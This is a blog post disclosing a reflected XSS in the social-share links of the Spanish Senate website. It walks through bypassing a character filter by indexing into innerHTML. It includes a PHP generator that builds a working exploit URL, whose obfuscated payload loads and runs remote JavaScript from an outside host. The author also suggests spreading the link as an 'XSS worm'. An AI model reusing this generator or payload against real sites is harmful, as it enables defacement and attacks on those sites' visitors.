On the next example I add a new attribute with name "aaabbb" and value "hello" to the social links:
Ok, I can add attributes to the links, now the problem is that if I try to use any of this characters: ', <, >, (, ) , the page redirect us to a 404 page:
Well, we have a problem, we can insert JavaScript code inside the attributes, but we can't execute anything without the ( or ) characters... or not...
If insert an attribute, for example onmouse over, you can insert assignations, for example:
var aux1 = this.parentNode.parentNode.innerHTML;
We didn't use any of the forbidden characters, and we have a very interesting string like:
<link type="text/css" href="/web/css/jquery-ui.css" rel="stylesheet"><a href="#" title="Enviar"><img src="/web/images/enviar.png" alt="Enviar" onclick="MostrarDialog();" title="Enviar"></a><a href="#" onclick="$("#menu_buscador").hide();
Ok, what can we do with variable assignations and this string on JavaScript to execute code out of the jail....
We can for example do the next:
this.innerHTML = "<img onload=\"code_to_execute();\">";
But... as you can see I'm using the <, (, ) and " characters and I can't use this characters on the URL. Then, for create the "<img..." string I can use the string that I get on the aux1 assignation.
For example for the < character I can do aux1[0], that concatenated with the aux1[2] will give me the sting "<i"and I don't need to use eny of the forbidden characters. Then doing:
this.innerHTML = aux1[0] + aux1[2] ....
I can obtain any string to be used as innerHTML, then I'm out of the jail :)
Is really tedious try to create complex strings concatenating characters one by one, to do this easy I did a very simple PHP script:
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| function buildInjection($inStr) | |
| { | |
| // This is the string that will return this.parentNode.parentNode.innerHTML | |
| // to the injected JavaScript | |
| $auxString = '<link type="text/css" href="/web/css/jquery-ui.css" rel="stylesheet"><a href="#" title="Enviar"><img src="/web/images/enviar.png" alt="Enviar" onclick="MostrarDialog();" title="Enviar"></a><a href="#" onclick="$("#menu_buscador").hide(); $("#menu_compartir").toggle();" title="Compartir"><img src="/web/images/compartir.png" alt="Compartir" title="Compartir"></a><div style="display: block;" id="menu_compartir" class="cortinaMenuTop2"><a href="http://www.tuenti.com/share?url=http://www.senado.es/web/conocersenado/arteypatrimonio/obrapictorica/index.html?http://tras2.es/ecce.pngSC0123456789," onmouseover="var aux1 = this.parentNode.parentNode.innerHTML;'; | |
| $resultChars = array(); | |
| for ($count = 0; $count < strlen($inStr); $count++) { | |
| if (($pos = strpos($auxString, $inStr[$count])) === false) { | |
| echo "ERROR: character: " . $inStr[$count] . " not found! :'(" . PHP_EOL; | |
| } | |
| $resultChars[] = "aux1[" . strpos($auxString, $inStr[$count]) . "]"; | |
| } | |
| return implode('+', $resultChars); | |
| } | |
| echo "http://www.senado.es/web/conocersenado/arteypatrimonio/obrapictorica/index.html?" . urlencode('http://tras2.es/ecce.pngSC0123456789," onmouseover="aux1 = this.parentNode.parentNode.innerHTML; this.innerHTML = ' . buildInjection("<img src=\"http://tras2.es/ecce.png\" onload=\"$.getScript(String.fromCharCode(104,116,116,112,58,47,47,116,114,97,115,50,46,101,115,47,115,101,110,46,106,115));\" />") . ';"') . PHP_EOL; |
The code that I inject modify the art gallery by another more sophisticated :) :
In resume, yes, we don't have a permanent XSS, but, we have the control of the site using the social links, then we can, for example, share this URL instead of the correct one by the social networks as a "XSS Worm":
I reported this bug a week ago to the official senate twitter account, and by e-mail but I didn't receive any answer:
A video that show all the process:
No hay comentarios:
Publicar un comentario